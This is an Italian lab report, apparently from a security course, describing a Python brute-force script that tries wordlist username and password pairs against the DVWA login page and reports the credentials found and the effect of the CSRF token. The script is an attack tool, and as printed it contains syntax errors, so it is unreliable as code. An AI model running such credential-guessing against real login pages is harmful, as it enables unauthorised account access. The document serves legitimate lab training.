Report Attacchi Brute Force

Per l'attacco bruteforce è stato usato il seguente codice

```
import http.client, urllib.parse
username file = open('/usr/share/nmap/nselib/data/usernames.lst')
password file = open('/usr/share/nmap/nselib/data/passwords.lst')
user list = username file.readlines()
pwd list = password file.readlines()
for user in user list:
        user = user.rstrip()
        for pwd in pwd list:
                pwd = pwd.rstrip()
                print (user,"-",pwd)
                post parameters = urllib.parse.urlencode({'username' : user, 'password': pwd, "Login":'Submit'})
                headers = {"Connect-type": "application/x-www form-urlencoded", "Accept": "text/html,application/xhtml+xlm"}
                conn = http.client.HTTPConnection("192.168.64.13",80)
                conn.request("POST" , "/dvwa/login.php" , post parameters, headers)
                response = conn.getresponse()
                print(response.status)
                if(response.getheader('location') == "index.php"):
                       print("Logged with:", user, " - ".pwd)
```

La prima parte del codice importa le librerie http.client e urllib.parse per poter utilizzare le funzioni al loro interno.

Inizialmente apriamo all'interno delle variabili username_file e password_file, rispettivamente le liste usernames.lst e passwords.lst.

Il ciclo <<for>> ha provato tutte le combinazioni di username-password, per testare tutte le varie combinazioni si è usato un ciclo for <<nidificato>>,

Le combinazioni di password e username sono state inviate alle pagina di login: </dvwa/login.php> tramite una richiesta HTTP request "POST"

Il codice ha dato come esito le seguenti credenziali d'accesso:

- ☐ Username: admin
- ☐ Password: password

Il programma ha impiegato circa 2 minuti a trovare le credenziali d'accesso.

Si è notato che all'aumentare del livello di sicurezza della DVWA il programma impiega più tempo a trovare le credenziali, tranne al livello HIGH dove non riesce ad effettuare l'accesso perchè è presente un token CSRF che ha la funzione di generare un token univoco della sessione che rende credibile l'origine della richiesta di accesso.

Se si prova ad eliminare il token CSRF viene mostrato un messaggio di errore (CSRF token is incorrect) quando si inseriscono le credenziali. Ad ogni caricamento della pagina viene generato un token CSRF diverso, di conseguenza è più difficile riuscire ad accedere alla pagina.

Si verificano le stesse situazioni anche effettuando l'attacco Brute Force sulla pagina phpMyAdmin